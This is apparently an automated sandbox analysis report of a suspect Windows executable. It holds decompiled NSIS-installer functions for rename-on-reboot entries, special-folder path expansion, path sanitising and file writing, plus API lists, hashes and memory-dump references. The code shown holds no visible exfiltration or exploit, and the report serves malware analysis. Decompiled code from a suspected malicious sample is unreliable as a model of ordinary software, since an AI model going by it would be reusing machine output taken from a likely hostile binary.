                        			E004058E6(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405F28(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423fd0 =  *0x423fd0 + 1;
						return _t20;
					}
				}
				 *0x4226c8 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422140, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421d40, "%s=%s\r\n", 0x4226c8, 0x422140);
						_t18 =  *0x423f50; // 0x571700
						_t56 = _t55 + 0x10;
						E00405BBA(_t43, 0x400, 0x422140, 0x422140,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040586F(0x422140, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004057E4(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004057E4(_t26 + 0xa, 0x4093e4);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405830(_t51 + _t29, 0x421d40, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B98(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040586F(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x4226c8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                        0x004058ec
                        0x004058f3
                        0x004058f7
                        0x00405900
                        0x00405904
                        0x00405a43
                        0x00405a43
                        0x00000000
                        0x00405a43
                        0x00405904
                        0x00405910
                        0x00405926
                        0x0040594e
                        0x00405959
                        0x0040595d
                        0x0040597d
                        0x0040597f
                        0x00405984
                        0x0040598e
                        0x0040599b
                        0x004059a0
                        0x004059a5
                        0x004059a9
                        0x00000000
                        0x00000000
                        0x004059b8
                        0x004059ba
                        0x004059c7
                        0x004059cb
                        0x00405a3c
                        0x00405a3d
                        0x00000000
                        0x004059e7
                        0x004059f4
                        0x00405a59
                        0x00405a60
                        0x00405a07
                        0x00405a07
                        0x00405a09
                        0x00405a12
                        0x00405a1d
                        0x00405a2f
                        0x00405a36
                        0x00000000
                        0x00405a36
                        0x00405a62
                        0x00405a63
                        0x00405a68
                        0x00405a6a
                        0x00405a77
                        0x00405a77
                        0x00405a7b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405a6c
                        0x00405a6c
                        0x00405a6f
                        0x00405a72
                        0x00405a73
                        0x00000000
                        0x00405a6c
                        0x004059ff
                        0x00405a04
                        0x00000000
                        0x00405a04
                        0x004059cb
                        0x00405928
                        0x00405933
                        0x0040593c
                        0x00405940
                        0x00000000
                        0x00000000
                        0x00405940
                        0x00405a4d

                        APIs
                          • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                          • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,0040567B,?,00000000,000000F1,?), ref: 00405933
                        • GetShortPathNameA.KERNEL32 ref: 0040593C
                        • GetShortPathNameA.KERNEL32 ref: 00405959
                        • wsprintfA.USER32 ref: 00405977
                        • GetFileSize.KERNEL32(00000000,00000000,00422140,C0000000,00000004,00422140,?,?,?,00000000,000000F1,?), ref: 004059B2
                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059C1
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059D7
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D40,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A1D
                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A2F
                        • GlobalFree.KERNEL32 ref: 00405A36
                        • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A3D
                          • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                          • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                        • String ID: %s=%s$@!B$[Rename]
                        • API String ID: 3445103937-2946522640
                        • Opcode ID: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                        • Instruction ID: 3fdb6a032fd62a2424e34f1ba2115feadd67922d203a780a084708b988c1bb31
                        • Opcode Fuzzy Hash: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                        • Instruction Fuzzy Hash: C8410231B01B167BD7206B619D89F6B3A5CEF44755F04013AFD05F62D2E67CA8008EAD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405BBA, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 74%
                        			E00405BBA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				intOrPtr _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x42371c; // 0x578476
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t73 =  *0x423f78; // 0x5768fc
				_t74 = _t73 + _t36;
				_t37 = 0x422ee0;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422ee0;
				if(_a4 - 0x422ee0 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405BBA(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422ee0;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x425000;
							E00405B98(_t86, (_t95 << 0xa) + 0x425000);
						} else {
							E00405AF6(_t86,  *0x423f48);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405DFA(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423fc4;
						if( *0x423fc4 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423f44; // 0x74691340
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423f48,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423f48,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423f78;
							E00405A7F(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423f78, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405BBA(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B98(_a4, _t37);
			}






























                        0x00405bba
                        0x00405bba
                        0x00405bba
                        0x00405bc0
                        0x00405bc5
                        0x00405bc7
                        0x00405bd6
                        0x00405bd6
                        0x00405bd8
                        0x00405be1
                        0x00405be3
                        0x00405be8
                        0x00405beb
                        0x00405bec
                        0x00405bf3
                        0x00405bf5
                        0x00405bfb
                        0x00405bfe
                        0x00405bfe
                        0x00405dd7
                        0x00405dd7
                        0x00405ddb
                        0x00000000
                        0x00000000
                        0x00405c0b
                        0x00405c11
                        0x00000000
                        0x00000000
                        0x00405c17
                        0x00405c18
                        0x00405c1b
                        0x00405c1e
                        0x00405dca
                        0x00405dd4
                        0x00405dd6
                        0x00405dd6
                        0x00405dcc
                        0x00405dce
                        0x00405dd0
                        0x00405dd1
                        0x00405dd1
                        0x00000000
                        0x00405dca
                        0x00405c24
                        0x00405c28
                        0x00405c38
                        0x00405c3c
                        0x00405c43
                        0x00405c46
                        0x00405c4a
                        0x00405c50
                        0x00405c53
                        0x00405c56
                        0x00405c59
                        0x00405d74
                        0x00405d77
                        0x00405da7
                        0x00405daa
                        0x00405daf
                        0x00405db3
                        0x00405db3
                        0x00405db8
                        0x00405db9
                        0x00405dbe
                        0x00405dc1
                        0x00405dc3
                        0x00000000
                        0x00405dc3
                        0x00405d79
                        0x00405d7c
                        0x00405d91
                        0x00405d98
                        0x00405d7e
                        0x00405d85
                        0x00405d85
                        0x00405da0
                        0x00405da3
                        0x00405d6c
                        0x00405d6d
                        0x00405d6d
                        0x00000000
                        0x00405da3
                        0x00405c61
                        0x00405c62
                        0x00405c68
                        0x00405c6a
                        0x00405c84
                        0x00405c84
                        0x00405c8b
                        0x00405c8b
                        0x00405c92
                        0x00405c96
                        0x00405c96
                        0x00405c97
                        0x00405c99
                        0x00405cd2
                        0x00405cd5
                        0x00405ce5
                        0x00405ce8
                        0x00405cf0
                        0x00405cf6
                        0x00405cf6
                        0x00405d52
                        0x00405d52
                        0x00405d54
                        0x00000000
                        0x00000000
                        0x00405cfa
                        0x00405d01
                        0x00405d02
                        0x00405d04
                        0x00405d1e
                        0x00405d2c
                        0x00405d32
                        0x00405d34
                        0x00405d4f
                        0x00405d4f
                        0x00405d4f
                        0x00000000
                        0x00405d4f
                        0x00405d3a
                        0x00405d45
                        0x00405d4b
                        0x00405d4d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405d4d
                        0x00405d06
                        0x00405d09
                        0x00000000
                        0x00000000
                        0x00405d18
                        0x00405d1a
                        0x00405d1c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405d1c
                        0x00000000
                        0x00405d52
                        0x00405cdd
                        0x00000000
                        0x00405c9b
                        0x00405ca0
                        0x00405cb6
                        0x00405cbb
                        0x00405cbe
                        0x00405d5b
                        0x00405d5b
                        0x00405d5f
                        0x00405d67
                        0x00405d67
                        0x00000000
                        0x00405d5f
                        0x00405cc8
                        0x00405d56
                        0x00405d56
                        0x00405d59
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405d59
                        0x00405c99
                        0x00405c6c
                        0x00405c70
                        0x00000000
                        0x00000000
                        0x00405c72
                        0x00405c76
                        0x00000000
                        0x00000000
                        0x00405c78
                        0x00405c7c
                        0x00000000
                        0x00405c7e
                        0x00405c7e
                        0x00000000
                        0x00405c7e
                        0x00405c7c
                        0x00405de1
                        0x00405deb
                        0x00405df7
                        0x00405df7
                        0x00000000

                        APIs
                        • GetVersion.KERNEL32(00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405C62
                        • GetSystemDirectoryA.KERNEL32 ref: 00405CDD
                        • GetWindowsDirectoryA.KERNEL32(kzopaqjcb,00000400), ref: 00405CF0
                        • SHGetSpecialFolderLocation.SHELL32(?,0040F0E0), ref: 00405D2C
                        • SHGetPathFromIDListA.SHELL32(0040F0E0,kzopaqjcb), ref: 00405D3A
                        • CoTaskMemFree.OLE32(0040F0E0), ref: 00405D45
                        • lstrcatA.KERNEL32(kzopaqjcb,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D67
                        • lstrlenA.KERNEL32(kzopaqjcb,00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405DB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                        • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$kzopaqjcb
                        • API String ID: 900638850-2090579738
                        • Opcode ID: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                        • Instruction ID: c09fc2b2839bb59ef3d9b0e1161cb0e194e2e056f91f07e7f33828596fbb00b3
                        • Opcode Fuzzy Hash: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                        • Instruction Fuzzy Hash: CE51F331A04A05AAEF215F648C88BBF3B74EF05714F10827BE911B62E0D27C5942DF5E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 10003A80, Relevance: 16.7, APIs: 11, Instructions: 154fileCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CreateErrorFileLast$CloseHandle
                        • String ID:
                        • API String ID: 3924142190-0
                        • Opcode ID: bdfed4501d41e445360fde7ee5d9e2410d7d25e907d395b969e3023fb81c397e
                        • Instruction ID: 2fc47295888d5b7e5a9022c748972a7964184d18b869063838eb98f6b0e0e0ed
                        • Opcode Fuzzy Hash: bdfed4501d41e445360fde7ee5d9e2410d7d25e907d395b969e3023fb81c397e
                        • Instruction Fuzzy Hash: A271A0B490435A8FEB00DFA8C58879EBBF0FB48354F10892AE855A7384D7759A44CF92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 100025C0, Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 321COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: W$decode failure: data corruption or bug.$z
                        • API String ID: 0-3221231465
                        • Opcode ID: 8c0eca85881d68956bd62b593d644393b674a9c1b91884bf57ca1af2d6b1295a
                        • Instruction ID: 1f20b8940b53e97c664d689cd33309f2c9898bf6c2576c384f23038d58263c73
                        • Opcode Fuzzy Hash: 8c0eca85881d68956bd62b593d644393b674a9c1b91884bf57ca1af2d6b1295a
                        • Instruction Fuzzy Hash: D6F1A174E0520ACFEB14DF98C585A9EBBF1FF48394F218429E849A7354C734A981CF92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405DFA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00405DFA(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056F8(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004056B6("*?|<>/\":", _t5))) == 0) {
							E00405830(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                        0x00405dfc
                        0x00405e04
                        0x00405e18
                        0x00405e18
                        0x00405e1e
                        0x00405e2b
                        0x00405e2b
                        0x00405e2c
                        0x00405e2e
                        0x00405e32
                        0x00405e34
                        0x00405e3d
                        0x00405e3f
                        0x00405e59
                        0x00405e61
                        0x00405e61
                        0x00405e66
                        0x00405e68
                        0x00405e6a
                        0x00405e6e
                        0x00405e6f
                        0x00405e72
                        0x00405e7a
                        0x00405e7c
                        0x00405e80
                        0x00000000
                        0x00000000
                        0x00405e86
                        0x00405e8b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405e8b
                        0x00405e90

                        APIs
                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\aZOmps0Ug8.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E52
                        • CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                        • CharNextA.USER32(?,"C:\Users\user\Desktop\aZOmps0Ug8.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E64
                        • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E74
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Char$Next$Prev
                        • String ID: "C:\Users\user\Desktop\aZOmps0Ug8.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                        • API String ID: 589700163-2542841984
                        • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                        • Instruction ID: 8fb4f4a5a46673644b6d17db89182f96b33943a1441b7055d0135b6347a17e40
                        • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                        • Instruction Fuzzy Hash: 0411B971804A9029EB321734DC44B7B7F88CB9A7A0F18447BD9D4722C2D67C5E429BED
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403EBB, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00403EBB(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                        0x00403ecd
                        0x00403f61
                        0x00000000
                        0x00403f61
                        0x00403ede
                        0x00403ee2
                        0x00000000
                        0x00000000
                        0x00403ee8
                        0x00403ef1
                        0x00403ef4
                        0x00403ef4
                        0x00403efa
                        0x00403f00
                        0x00403f00
                        0x00403f0c
                        0x00403f12
                        0x00403f19
                        0x00403f1c
                        0x00403f1f
                        0x00403f21
                        0x00403f21
                        0x00403f29
                        0x00403f2f
                        0x00403f2f
                        0x00403f39
                        0x00403f3e
                        0x00403f41
                        0x00403f46
                        0x00403f49
                        0x00403f49
                        0x00403f59
                        0x00403f59
                        0x00000000

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                        • String ID:
                        • API String ID: 2320649405-0
                        • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                        • Instruction ID: 51638b03811fbd3f25a4eb1d810876b9f584da0c3187da66c7daa715c1b02470
                        • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                        • Instruction Fuzzy Hash: 08218471904745ABCB219F78DD08B4BBFF8AF05715B048629F856E22E0D734E904CB55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 86%
                        			E004026AF(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A29(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E004056F8(_t52) == 0) {
					E00402A29(0xffffffed);
				}
				E00405850(_t52);
				_t27 = E0040586F(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423f54; // 0x8200
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030B3(_t47);
						E00403081(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E00405830( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
